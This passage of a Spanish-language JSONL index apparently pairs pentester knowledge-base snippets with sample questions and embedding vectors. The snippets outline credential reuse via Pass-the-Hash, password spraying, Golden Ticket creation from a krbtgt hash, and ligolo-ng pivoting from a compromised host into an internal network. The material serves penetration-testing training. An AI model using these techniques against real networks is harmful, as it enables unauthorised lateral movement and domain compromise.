-0.01398, -0.01636, -0.06464, 0.08699, 0.10047, -0.06258, -0.05432, -0.0221, -0.00651, -0.10206, 0.0123, -0.02857, -0.03162, -0.02571, 0.04952, 0.01963, -0.019, 0.06014, 0.05373]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Combos\n- **ReutilizaciΓ³n**: prueba el hash/usuario contra **todos** los hosts (MetodologΓ­a OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt β†’ ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket Β· Movimiento lateral Β· OSCP MOC", "indexar": "que herramienta puedo usar para probar credenciales contra varios hosts a la vez?", "v": [-0.04218, 0.06821, -0.25565, -0.0786, 0.04158, 0.00815, 0.01037, 0.00413, -0.03923, -0.22366, -0.1235, 0.03178, -0.03442, -0.04327, 0.01256, 0.0338, 0.0621, -0.08118, 0.01383, 0.02209, -0.00398, -0.11276, -0.14075, -0.04332, -0.03966, 0.01116, 0.07598, -0.02975, -0.10041, -0.00371, -0.07823, -0.02329, 0.01931, -0.02817, -0.08901, -0.04728, -0.11931, 0.01876, 0.08514, 0.13212, 0.06248, 0.01504, -0.04542, -0.00141, -0.00785, 0.05385, -0.12024, -0.00044, -0.15054, 0.04566, -0.02414, -0.2151, -0.14801, -0.01575, 0.00194, -0.15491, 0.08801, -0.12329, 0.00135, -0.09769, -0.07234, 0.02109, 0.04433, 0.03004, 0.01206, -0.05643, -0.07274, -0.09557, -0.18935, 0.04732, -0.07111, 0.05651, 0.05503, -0.00145, -0.03553, 0.02954, 0.0435, 0.02134, 0.0398, -0.03544, -0.01967, -0.03276, -0.03188, 0.02456, -0.08152, -0.12855, 0.05027, -0.09213, 0.01149, -0.05193, 0.00933, 0.11478, 0.04825, -0.01142, 0.07226, -0.07046, 0.10978, -0.01686, 0.03475, -0.0503, 0.13186, -0.05864, -0.04384, 0.11875, -0.06452, -1e-05, -0.01545, -0.00433, -0.01866, -0.05063, 0.02777, -0.01756, -0.10614, 0.0361, -0.03588, 0.04122, -0.05631, -0.0695, -0.00276, -0.07032, 0.04117, -0.06815, -0.01043, -0.0044, 0.10194, 0.04661, -0.04846, 0.03507, -0.02607, -0.0339, -0.04819, -0.01669, -0.04804, 0.02064, -0.0273, -0.00852, 0.00357, -0.11942, -0.04625, 0.02805, 0.02301, 0.07742, -0.03072, -0.11037, 0.03579, -0.00295, -0.0822, -0.07628, -0.0434, 0.01326, 0.04705, -0.01453, 0.00741, 0.03962, -0.10206, -0.02169, 0.0668, -0.04131, -0.07301, 0.07193, -0.10529, -0.07817, 0.03503, 0.07385, 0.06072, -0.0795, 0.02514, -0.04257, 0.03234, 0.06602, 0.04317, 0.08878, -0.00079, -0.02369, 0.0451, -0.03167, -0.03534, -0.02498, -0.02776, -0.12375, 0.02366, -0.00302, -0.06628, -0.0354, 0.02949, 0.03047, 0.02111, 0.08091, 0.00513, 0.01433, -0.01769, 0.06538, 0.04338, -0.01571, 0.03037, 0.01753, 0.02319, -0.07191, 0.00926, -0.00569, -0.05567, -0.01212, -0.03802, -0.06542, 0.07142, 0.02757, -0.03447, 0.01576, 0.0233, 0.00572, 0.06884, -0.04955, 0.09166, -0.04013, -0.06112, -0.01342, -0.02906, 0.00558, -0.03174, -0.01678, 0.05274, 0.05526, -0.00208, 0.02369, -0.00265, 0.02363, 0.0251, 0.00263, 0.0086, 0.00617, 0.02136, -0.0163, -0.03803, -0.02347, 0.01795, -0.03884, 0.07295, -0.01439, -0.06888, -0.04197, -0.03818, 0.07437, -0.00216, -0.04094, -0.05658, -0.02822, -0.04619, -0.00544, -0.0227, -0.05389, -0.01899, 0.03967, 0.09158, -0.06102, 0.0117, 0.0089]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Combos\n- **ReutilizaciΓ³n**: prueba el hash/usuario contra **todos** los hosts (MetodologΓ­a OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt β†’ ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket Β· Movimiento lateral Β· OSCP MOC", "indexar": "cual programa me ayuda en el ataque de spray de contraseΓ±as?", "v": [0.07297, 0.14508, -0.11966, -0.20975, -0.07179, -0.0828, 0.01391, -0.09261, -0.09369, 0.07896, -0.01005, -0.02877, -0.07375, -0.11953, -0.03411, -0.09338, 0.12079, 0.09425, 0.12974, 0.05259, 0.0183, -0.04544, -0.05339, -0.00831, -0.13127, 0.06581, 0.02511, 0.07771, -0.12589, -0.11229, -0.00763, -0.08579, 0.05053, 0.02978, 0.01236, 0.07867, 0.03505, 0.09507, 0.08982, 0.16536, -0.01851, -0.12116, -0.13427, 0.02098, 0.10684, -0.01218, 0.07067, 0.04427, 0.10701, -0.02452, -0.04422, 0.05847, -0.09124, -0.13882, -0.04067, -0.12098, 0.05329, -0.09029, -0.05808, 0.01495, -0.10011, -0.00784, 0.04699, 0.01278, -0.0401, -0.03384, 0.08085, -0.05771, -0.10217, 0.0713, 0.0301, -0.0102, -0.00567, -0.0269, -0.02911, 0.00113, 0.01844, -0.01392, -0.00105, -0.01629, -0.0468, 0.00037, 0.05153, 0.0183, -0.09062, -0.00322, -0.00329, -0.02027, -0.03388, -0.07593, 0.05163, -0.06346, -0.03947, 0.06355, -0.06485, -0.06444, 0.06187, -0.04214, -0.00279, 0.01663, -0.0046, -0.14954, -0.06993, 0.1221, 0.01561, -0.00828, 0.00401, -0.00545, -0.07441, -0.04755, -0.00065, -0.02478, -0.03483, -0.11236, 0.05864, -0.04822, -0.05137, -0.02227, 0.08538, -0.06382, -0.13991, -0.00383, -0.04393, 0.11523, 0.06796, 0.05104, 0.00045, -0.07233, -0.13522, -0.00111, 0.03092, -0.02009, -0.00304, -0.01369, 0.01953, 0.05487, 0.02508, -0.09133, -0.10741, 0.05581, 0.04971, 0.0407, 0.06028, 0.02156, 0.01312, 0.01073, 0.03698, -0.08015, -0.06545, 0.03676, 0.00997, 0.00369, 0.06969, 0.08333, -0.05229, -0.06051, -0.00912, -0.0292, -0.07599, 0.094, -0.06005, 0.00375, -0.02959, 0.02556, -0.06945, -0.03613, 0.03086, -0.00647, 0.08045, 0.11052, 0.02118, 0.02422, 0.05442, 0.01527, -0.044, -0.06928, 0.01909, -0.11771, 0.04994, -0.05664, -0.02873, -0.02079, 0.00477, 0.006, 0.0312, -0.05791, 0.07595, 0.05175, 0.01578, 0.02406, -0.0258, -0.03489, -0.04079, -0.01115, 0.00927, -0.05308, -0.05026, -0.03871, 0.00475, -0.04432, -0.02543, -0.02418, -0.04869, -0.08241, 0.06939, 0.11134, -0.05717, -0.03913, -0.01372, 0.0905, 0.03628, -0.00629, 0.0359, 0.00197, -0.11564, -0.03588, -0.00601, 0.03473, -0.00503, -0.02126, 0.05436, -0.0266, 0.05079, 0.07186, -0.0101, -0.08364, 0.03105, -0.00723, 0.01569, 0.03934, -0.06335, -0.07005, 0.02898, -0.05196, 0.07582, -0.03053, -0.03666, -0.03795, -0.04383, -0.05059, -0.04077, 0.04561, 0.03261, -0.05368, -0.04598, -0.00764, -0.0641, 0.007, -0.03774, -0.00238, -0.02458, 0.05875, 0.04702, -0.02697, 0.08692, 0.0016]} +{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Combos\n- **ReutilizaciΓ³n**: prueba el hash/usuario contra **todos** los hosts (MetodologΓ­a OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt β†’ ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket Β· Movimiento lateral Β· OSCP MOC", "indexar": "como hago para convertir un hash de krbtgt en un Golden Ticket?", "v": [0.04719, -0.25221, 0.06093, 0.0288, -0.03435, -0.09269, -0.03086, 0.20378, 0.01554, -0.04361, -0.13003, 0.01441, -0.06365, 0.13622, 0.06232, 0.05383, -0.10377, -0.01695, -0.0446, 0.07189, 0.02146, 0.06965, 0.03651, -0.06137, 0.03319, -0.14858, 0.01088, 0.15795, -0.2035, 0.05752, 0.08736, -0.22532, -0.24425, 0.00798, -0.13202, -0.05371, -0.03455, 0.16799, 0.04472, 0.01856, 0.04936, -0.03869, 0.06219, 0.1571, 0.06849, -0.12727, 0.00716, 0.04351, -0.10762, -0.01032, -0.00651, -0.00226, -0.19185, -0.07179, 0.01146, -0.07543, -0.09633, -0.13967, -0.0988, -0.0037, -0.06302, -0.07745, -0.06164, -0.00984, -0.08141, 0.08326, -0.09472, 0.01677, -0.04121, -0.02727, -0.07335, 0.08695, -0.05834, 0.08093, 0.07641, 0.03811, 0.06968, -0.03852, 0.02775, 0.04638, 0.04429, -0.08021, 0.01335, -0.00268, -0.04539, -0.09394, 0.09321, -0.10942, 0.00641, 0.03653, -0.00912, 0.03758, 0.09139, 0.03069, 0.00223, -0.08544, -0.0662, -0.0239, -0.05215, 0.05756, -0.03128, 0.04858, -0.04046, 0.10772, -0.04296, 0.02087, 0.03722, -0.014, 0.02571, 0.01454, -0.0357, 0.0462, -0.10116, -0.03172, -0.01044, 0.02581, 0.05257, -0.05448, 0.04716, -0.02491, -0.02918, -0.03335, 0.01668, -0.01988, 0.0597, 0.0278, -0.07641, -0.02159, 0.04039, 0.04867, -0.06689, 0.079, 0.02171, -0.00023, 0.00058, 0.01774, 0.03518, 0.01178, 0.02752, -0.01058, -0.04471, 0.01849, 0.0189, -0.09268, 0.03592, -0.06851, -0.01953, -0.01628, -0.00703, -0.03878, -0.04025, -0.03705, -0.02172, 0.05879, -0.04319, -0.02564, -0.02418, -0.02062, -0.04298, 0.03608, 0.00888, 0.02706, 0.00216, 0.00316, -0.0058, 0.01326, -0.02139, 0.02555, 0.02537, -0.02179, 0.05592, -0.03352, 0.01905, 0.02844, 0.02194, -0.00575, -0.04576, 0.00111, 0.01375, -0.06184, 0.07471, 0.02366, -0.01617, 0.0281, -0.01272, 0.00567, 0.08101, 0.00771, 0.04412, -0.00623, -0.05544, 0.00781, -0.00365, 0.03411, 0.00881, -0.03534, 0.00403, -0.02185, 0.01143, -0.06332, -0.00789, 0.0208, -0.00475, -0.00143, 0.02947, -0.01605, -0.03317, 0.01674, -0.06508, 0.03269, 0.02609, -0.01257, 0.10646, -0.02652, -0.01553, 0.02283, -0.00765, -0.00477, -0.05363, 0.0237, 0.05798, 0.01581, -0.00939, -0.05423, -0.02623, -0.02533, 0.03428, 0.02704, 0.03083, 0.05986, 0.01473, 0.00919, -0.02246, 0.06571, 0.02371, 0.03294, -0.03093, -0.01998, -0.06165, -0.01773, 0.02674, 0.02818, -0.01446, 0.06341, 0.03661, 0.00263, -0.05971, 0.08758, 0.08372, -0.05155, -0.00766, -0.01988, 0.03237, -0.02923, -0.01536, -0.02631]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pivoting (ligolo-ng)\n\n> Entrar en una **red interna** no enrutable desde Kali, a travΓ©s de una mΓ‘quina comprometida. En `tu carpeta`.", "indexar": "que programa hay para entrar en una red interna no enrutable desde otra mΓ‘quina?", "v": [-0.08303, 0.00898, -0.06179, -0.11213, -0.02186, -0.04999, -0.09501, -0.01013, -0.04754, -0.08741, -0.1584, -0.07846, 0.10009, -0.08957, 0.06424, 0.03903, -0.05095, -0.00427, 0.16301, -0.0077, -0.09199, 0.02202, -0.02438, 0.02595, -0.05929, 0.12251, -0.00592, -0.00078, -0.12449, -0.04673, 0.03763, -0.06494, 0.10182, -0.12162, 0.01198, -0.10027, 0.1303, 0.0461, 0.0046, 0.01443, 0.003, 0.06075, -0.09221, 0.04921, 0.18393, -0.01155, 0.18262, 0.01666, 0.03878, 0.0353, -0.07597, -0.08302, 0.03426, -0.06859, 0.04693, -0.21487, -0.03322, -0.05052, -0.0925, -0.06393, -0.01113, 0.08421, -0.06672, 0.01401, -0.00438, 0.03968, 0.0422, 0.07174, -0.00953, 0.05808, -0.0316, -0.00017, -0.03215, -0.03256, 0.08749, 0.03996, -0.03765, 0.01425, 0.0953, -0.01472, -0.03329, 0.04107, -0.02425, 0.05832, 0.03951, -0.07693, 0.14518, -0.07597, 0.02901, -0.02969, 0.03605, 0.00466, 0.04484, 0.07504, 0.12931, 0.01531, 0.11226, 0.01135, 0.03596, -0.00726, 0.06432, -0.03587, -0.04067, 0.0749, -0.09764, 0.11309, 0.07175, -0.03544, 0.03287, 0.0443, 0.08833, -0.00335, 0.02773, -0.06087, -0.05158, -0.00488, 0.01926, 0.03889, -0.02929, -0.02993, -0.15103, 0.05564, -0.09066, -0.04647, -0.01161, -0.05265, -0.01524, 0.07101, -0.08032, 0.02586, 0.01323, 0.00949, 0.01269, -0.01791, -0.06528, -0.04451, -0.0426, -0.13367, 0.01115, -0.09775, 0.00925, 0.08559, -0.02433, -0.03232, -0.03047, 0.03299, 0.06078, -0.12095, -0.0098, 0.12331, -0.00493, 0.00242, 0.01303, 0.09739, -0.05402, 0.12904, 0.00564, -0.01209, -0.10494, 0.06046, -0.06237, -0.03395, -0.05245, -0.03733, 0.01981, -0.01315, -0.01984, -0.00782, 0.06733, 0.01568, -0.02114, 0.05098, 0.01238, -0.00513, -0.00752, -0.01847, -0.00931, -0.10811, 0.04011, -0.10676, -0.04829, 0.07634, 0.04182, -0.08536, -0.01868, -0.05985, -0.05403, 0.02301, 0.02732, -0.07086, -0.00346, -0.00964, -0.01954, 0.04978, 0.06296, 0.04541, -0.03869, 0.02658, 0.06077, -0.04429, -0.11892, 0.04222, -0.03604, 0.01297, 0.02342, 0.06684, -0.01163, 0.0227, 0.01788, 0.1376, 0.03227, 0.03884, -0.00592, 0.03745, -0.06873, -0.00558, 0.03124, 0.06699, 0.03567, 0.01844, 0.11215, -0.07009, 0.02295, 0.07079, -0.02014, -0.0703, -0.00767, 0.03238, 0.03155, 0.04346, -0.00117, -0.02472, 0.02313, -0.06089, -0.01807, -0.03238, 0.02982, 0.01813, 0.006, -0.11733, -0.03831, 0.05639, -0.00012, -0.01946, -0.01602, 0.01148, -0.04654, 0.00474, 0.01578, -0.00167, -0.04978, 0.02781, 0.00142, -0.07305, 0.04444, 0.07076]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pivoting (ligolo-ng)\n\n> Entrar en una **red interna** no enrutable desde Kali, a travΓ©s de una mΓ‘quina comprometida. En `tu carpeta`.", "indexar": "cual es una herramienta que me permita pivotear desde una mΓ‘quina comprometida?", "v": [0.03353, 0.09852, -0.12217, -0.07019, 0.06889, -0.08961, -0.08273, -0.01847, -0.13893, -0.15126, 0.04049, 0.07744, 0.06747, 0.00183, 0.04062, 0.00795, 0.02405, -0.04761, 0.02421, 0.03436, -0.01934, 0.00055, -0.03897, -0.04779, -0.06786, 0.09512, 0.11845, 0.07538, -0.32321, 0.02608, -0.02894, 0.05722, 0.07297, -0.11195, 0.0173, -0.11296, 0.01172, 0.06497, 0.07378, 0.02931, -0.02016, -0.0214, -0.05141, 0.09348, 0.13519, -0.04062, -0.0299, 0.0296, 0.04914, 0.11723, -0.08821, -0.04201, -0.03866, 0.08813, 0.03821, -0.1532, 0.23102, -0.02561, 0.05973, -0.13101, -0.12994, 0.00517, -0.05853, -0.03975, -0.07672, -0.01741, -0.02907, -0.16193, -0.05808, 0.07895, 0.00263, -0.01339, 0.02817, -0.01819, 0.0623, -0.02769, 0.03325, 0.0526, 0.06996, 0.01574, 0.07873, -0.0361, -0.02987, 0.05087, -0.00214, -0.07999, 0.10751, 0.08415, 0.06407, -0.07458, -0.04292, 0.04057, -0.03202, 0.04264, 0.03623, -0.0493, 0.01626, 0.03944, 0.00983, -0.09539, 0.19987, -0.01505, -0.06896, 0.04273, -0.03033, 0.02839, -0.03546, 0.00795, -0.07165, 0.0154, 0.04389, 0.06546, -0.01016, -0.01503, 0.00216, 0.07657, -0.04922, -0.06667, -0.05543, -0.07938, 0.07813, 0.03202, 0.00143, -0.06264, 0.01227, 0.00653, -0.0672, 0.11198, -0.00748, -0.08711, 0.03754, 0.00244, -0.03259, 0.0408, -0.00782, -0.0555, 0.09018, -0.11683, 0.00034, -0.0262, 0.0435, 0.08947, 0.00935, -0.05874, 0.02164, -0.03864, 0.01014, -0.09205, -0.08871, -0.0102, 0.01677, 0.01051, 0.05836, 0.08, -0.06041, 0.0541, -0.06938, 0.03501, -0.06046, 0.01329, -0.04044, -0.01527, 0.07364, -0.01013, -0.00372, -0.01814, -0.00612, 0.04175, 0.06747, -0.0227, 0.0038, 0.01041, 0.05042, 0.03785, 0.0009, -0.082, -0.03566, 0.02408, -0.02551, -0.05203, -0.05846, 0.04982, -0.01891, -0.05396, 0.01981, 0.00324, 0.0327, -0.03173, 0.03294, -0.01821, 0.01793, 0.04663, -0.01737, -0.12392, 0.04771, -0.0089, -0.05295, 0.01087, 0.10779, -0.01075, -0.05179, -0.00433, -0.08271, -0.03211, -0.02805, 0.04484, -0.02265, -0.09889, -0.01965, -0.02464, 0.04241, 0.0222, 0.03974, -0.02126, -0.00498, -0.01129, -0.01073, 0.01303, -0.04506, 0.01678, 0.05973, -0.03856, 0.05826, -0.02307, -0.0395, -0.00547, 0.0577, 0.04588, 0.00949, -0.00927, 0.02412, -0.03122, -0.01248, -0.0497, 0.03379, -0.02756, 0.04272, -0.05856, -0.06814, -0.07187, 0.04763, 0.04257, 0.02998, -0.07101, -0.01973, -0.01178, 0.00154, -0.03503, -0.06144, -0.07498, -0.02066, 0.03679, 0.03632, -0.05345, 0.04488, 0.00036]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pivoting (ligolo-ng)\n\n> Entrar en una **red interna** no enrutable desde Kali, a travΓ©s de una mΓ‘quina comprometida. En `tu carpeta`.", "indexar": "como puedo acceder a una red interna sin ruta directa usando una mΓ‘quina intermedia?", "v": [-0.02816, 0.00574, -0.2147, -0.0384, 0.04124, 0.02532, -0.12145, -0.01171, -0.10055, -0.08158, -0.14577, -0.11253, 0.08416, -0.02513, 0.08005, -0.0057, 0.0327, 0.14353, -0.03198, -0.1538, 0.00474, -0.12033, 0.00505, 0.05032, -0.00229, 0.11448, 0.08886, -0.01203, -0.02878, -0.09683, 0.05058, 0.04675, 0.11621, -0.09261, -0.10109, -0.10673, -0.02354, 0.14371, 0.04834, -0.03629, -0.03075, 0.07522, -0.1474, -0.01197, 0.18369, -0.00218, 0.00877, -0.07512, -0.07758, 0.01082, -0.10835, -0.12729, -0.14018, -0.07032, -0.00168, -0.12478, 0.12269, -0.01505, 0.01203, -0.01038, 0.05011, 0.03867, -0.04593, 0.10467, 0.04612, -0.05209, -0.00485, -0.06051, -0.03164, -0.00838, -0.01082, 0.04693, -0.0459, -0.0252, 0.09478, 0.04905, -0.02309, 0.10483, 0.10276, -0.0035, 0.05987, 0.04521, -0.04972, -0.04748, 0.03458, -0.07972, 0.15387, -0.04876, 0.03674, -0.07159, 0.02839, -0.02353, 0.01285, -0.00617, 0.04089, -0.01526, -0.03131, -0.04226, 0.05564, -0.07857, 0.04206, 0.01276, -0.12791, 0.11592, -0.02983, 0.02869, 0.07384, -0.07356, 0.00676, 0.03783, 0.06912, 0.01247, -0.07336, -0.12606, 0.01086, 0.01331, -0.00959, -0.0124, -0.0656, -0.04516, -0.09172, -0.03313, -0.08791, -0.0265, -0.02626, -0.08323, -0.05569, 0.05333, -0.02922, -0.00646, 0.01106, 0.07968, -0.03349, -0.11044, -0.03422, -0.0373, -0.03837, -0.07735, 0.05642, -0.0834, 0.01872, 0.04481, -0.11374, -0.08163, 0.00297, 0.06275, 0.00096, -0.21185, 0.00015, 0.03078, -0.01534, -0.02745, -0.0047, 0.07846, -0.00414, 0.08479, -0.02022, -0.03906, -0.05527, 0.10613, -0.03095, -0.00316, -0.06725, -0.00235, -0.03671, -0.00741, -0.04011, -0.0486, 0.01939, -0.04492, -0.03715, 0.05666, -0.02269, 0.00865, -0.00923, -0.05411, -0.03302, -0.0504, 0.09113, -0.00849, 0.01143, 0.01651, -0.04718, -0.09531, -0.08109, -0.03658, -0.00661, -0.01898, 0.03577, 0.00138, 0.01503, 0.00774, 0.0326, 0.00255, 0.04763, 0.02026, -0.02787, 0.05772, 0.00726, -0.01411, -0.08144, 0.04161, -0.07743, -0.02757, 0.07677, 0.02007, -0.04527, 0.04392, -0.00229, 0.10586, 0.04526, -0.00847, 0.01819, -0.02414, -0.03097, 0.02979, 0.05685, -0.02493, -0.0273, 0.01617, 0.06341, 0.02614, 0.01532, 0.01354, 0.0561, 0.02149, 0.00669, -0.03787, -0.00885, 0.04429, -0.01166, 0.02343, -0.0415, -0.02005, 0.07183, 0.0135, 0.02664, 0.01298, -0.06507, -0.02378, 0.03674, 0.0701, -0.02592, -0.03246, -0.00901, -0.0025, -0.07233, 0.00135, 0.00394, -0.0597, -0.04148, 0.03014, 0.04738, -0.02477, -0.00461, -0.03225]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## El concepto\n```\nKALI 10.10.10.5 ── tΓΊnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la vΓ­ctima.\n- AΓ±ades una ruta y las tools tiran por el tΓΊnel **transparentemente**.", "indexar": "quΓ© programa puedo usar para montar un proxy transparente que redirija mi trΓ‘fico hacia una red interna?", "v": [-0.08718, 0.00915, -0.24247, -0.14213, 0.08655, -0.00306, -0.01033, 0.00315, -0.08784, -0.13247, -0.03275, -0.13719, 0.13725, -0.12196, 0.06748, 0.01615, 0.01967, 0.0624, 0.15449, -0.08809, -0.05876, -0.12927, -0.11978, -0.11846, 0.06841, 0.08237, 0.06559, -0.08395, -0.07238, -0.09788, -0.03695, 0.07562, 0.18736, -0.014, -0.10809, -0.02496, 0.05124, 0.0365, 0.06525, -0.04083, 0.04722, -0.11763, -0.02312, 0.00383, 0.10621, 0.02805, 0.0027, -0.12545, -0.09756, -0.04099, 0.02979, -0.15391, -0.17448, 0.01987, -0.00846, -0.10617, -0.05181, -0.14741, -0.10432, -0.02998, 0.10934, 0.06748, 0.00211, 0.07725, 0.00627, -0.13162, 0.00969, 0.06811, -0.14065, 0.0703, 0.03939, 0.00976, -0.00572, 0.02578, 0.00949, 0.03485, -0.03189, -0.02287, 0.07046, 0.04937, 0.02888, 0.13864, -0.04668, 0.01116, -0.00726, -0.06076, 0.00591, -0.06349, 0.05111, 0.04226, -0.00663, 0.03574, 0.05451, -0.01495, 0.10379, -0.01139, 0.00968, 0.03716, 0.0066, -0.00948, 0.03937, -0.0239, -0.0607, 0.0725, 0.04123, 0.069, 0.05333, -0.08136, 0.063, 0.02436, 0.04993, 0.00483, -0.0525, -0.09859, 0.00264, -0.06069, -0.01403, 0.09983, -0.04313, -0.02018, -0.03522, 0.02387, -0.06546, 0.01319, 0.05137, -0.05244, -0.03049, 0.08677, -0.09289, 0.0619, -0.00263, 0.03127, -0.08335, -0.12891, -0.06602, -0.01783, -0.04051, -0.07684, 0.02192, -0.00241, 0.03728, -0.06801, -0.048, -0.03185, -0.00992, 0.06059, 0.02224, -0.08429, 0.05952, 0.01921, 0.00159, -0.0014, -0.00671, 0.00924, 0.01641, 0.05235, 0.04617, -0.08424, -0.03126, 0.02632, -0.04419, 0.01541, -0.04118, 0.02414, 0.0733, -0.01291, 0.01001, -0.01391, 0.06514, 0.03679, 0.00392, 0.09483, -0.0117, -0.10566, -0.03441, -0.03148, -0.09425, -0.09705, -0.01452, -0.07491, 0.04006, -0.037, 0.03875, 0.03206, -0.01136, -0.03956, 0.01001, 0.03164, -0.03587, 0.00801, -0.03656, 0.03637, 0.03083, 0.01793, 0.03001, 0.02049, -0.02552, -0.06416, 0.02912, -0.09211, -0.03631, -0.01102, 0.04082, -0.03383, 0.00456, -0.01163, -0.01875, 0.03796, 0.0701, 0.11711, 0.04201, -0.03028, 0.04495, 0.00369, -0.03368, 0.03368, 0.02629, -0.0029, 0.01293, 0.04833, 0.05895, 0.04932, 0.004, 0.01073, 0.03926, 0.00988, -0.02261, -0.02423, 0.02753, 0.06254, 0.01213, -0.01613, -0.03568, -0.01805, -0.02866, -0.01111, -0.03986, 0.02346, 0.00959, -0.05667, 0.0075, 0.03843, -0.00132, -0.05121, -0.01065, 0.00882, -0.0435, 0.0471, -0.00284, -0.03911, -0.06448, 0.04009, -0.00342, -0.07444, 0.02279, 0.04399]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## El concepto\n```\nKALI 10.10.10.5 ── tΓΊnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la vΓ­ctima.\n- AΓ±ades una ruta y las tools tiran por el tΓΊnel **transparentemente**.", "indexar": "con quΓ© herramienta puedo hacer que mis aplicaciones usen un tunnel sin configuraciones manuales?", "v": [-0.07249, 0.06693, -0.19408, -0.24244, 0.05944, -0.04881, -0.1479, 0.02178, -0.0411, 0.05638, -0.2053, 0.01134, 0.02838, 0.04411, -0.04396, 0.01093, 0.07445, -0.12757, 0.1027, 0.02814, -0.10648, -0.02901, -0.12813, 0.00348, -0.0945, 0.01088, 0.09913, -0.09718, -0.17981, -0.09616, 0.00719, 0.04569, 0.16448, -0.0853, -0.09147, -0.04305, -0.07902, 0.11252, -0.01643, 0.02922, -0.02327, -0.01497, -0.11539, 0.05694, 0.04972, -0.05134, 0.02509, -0.05745, -0.07988, 0.02519, -0.02975, -0.14689, -0.13352, 0.01717, 0.08645, -0.15093, 0.21409, -0.15946, 0.12332, -0.07215, -0.03755, 0.00022, -0.02681, 0.07819, 0.06414, 0.01459, -0.01361, -0.04275, -0.11075, 0.12366, -0.0144, 0.08254, -0.01512, 0.05011, 0.08007, 0.03323, -0.03786, -0.02612, 0.06634, 0.04006, 0.02129, 0.00972, -0.06462, 0.01135, -0.03179, -0.04172, 0.06434, 0.02411, 0.03452, -0.09697, -0.07897, 0.00785, -0.02601, 0.02193, 0.08831, -0.03321, 0.04058, 0.05013, -0.01388, 0.01011, 0.07435, -0.02958, -0.11821, 0.09008, -0.04613, 0.04383, 0.00846, -0.0676, -0.02858, -0.01287, 0.03928, 0.02689, 0.02679, -0.01552, -0.07681, 0.04284, -0.01922, -0.0777, -0.03383, -0.0755, -0.02106, -0.03953, -0.04418, -0.02723, -0.00988, 0.01355, 0.01933, 0.13593, 0.00391, 0.04666, 0.00453, -0.03651, -0.08144, -0.02554, -0.03684, 0.03641, 0.01682, -0.08552, 0.01163, -0.03885, 0.02998, 0.02356, -0.00335, -0.02524, 0.06561, 0.01657, -0.04679, -0.05047, 0.01235, -0.04537, 0.03319, -0.04523, 0.00728, 0.02031, -0.01822, 0.0042, -0.04064, -0.00363, -0.07291, 0.10358, -0.05203, -0.042, -0.00122, -0.06017, 0.00078, -0.06378, -0.00943, -0.02602, 0.08131, 0.029, 0.0201, 0.05246, 0.01414, -0.0577, 0.04589, -0.04319, -0.02493, -0.03172, 0.0092, -0.04991, -0.05314, -0.09792, 0.03086, 0.00182, -0.00268, -0.10102, 0.005, -0.02124, 0.06365, 0.07131, -0.05273, 0.05925, 0.0021, -0.01688, 0.0423, 0.00066, 0.00745, -0.0808, -0.01261, -0.0146, -0.02064, -0.02415, -0.01186, -0.03009, 0.04001, 0.08339, -0.03101, 0.00235, 0.00851, 0.08303, 0.06552, -0.03569, 0.02746, 0.00018, 0.01846, -0.00798, 0.03514, 0.08693, -0.04189, -0.02824, 0.04178, 0.00413, 0.05425, -0.01886, -0.06085, 0.02836, -0.0017, 0.01701, -0.02376, -0.01026, 0.04524, -0.02614, -0.04145, -0.01226, 0.0277, -0.00811, 0.01343, -0.00476, -0.05185, -0.01226, -0.00496, 0.04111, 0.04985, -0.01373, -0.06386, 0.00295, 0.01252, -0.01264, -0.03914, -0.06185, -0.01395, 0.04338, 0.05479, -0.04924, 0.05027, -0.01595]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## El concepto\n```\nKALI 10.10.10.5 ── tΓΊnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la vΓ­ctima.\n- AΓ±ades una ruta y las tools tiran por el tΓΊnel **transparentemente**.", "indexar": "cuΓ‘l es la forma de aΓ±adir rutas a travΓ©s de un tΓΊnel sin tener que configurar cada aplicaciΓ³n por separado?", "v": [0.10442, 0.11318, -0.15359, -0.11917, 0.15394, 0.01383, 0.00409, -0.01406, 0.00601, 0.02559, -0.18036, -0.05865, 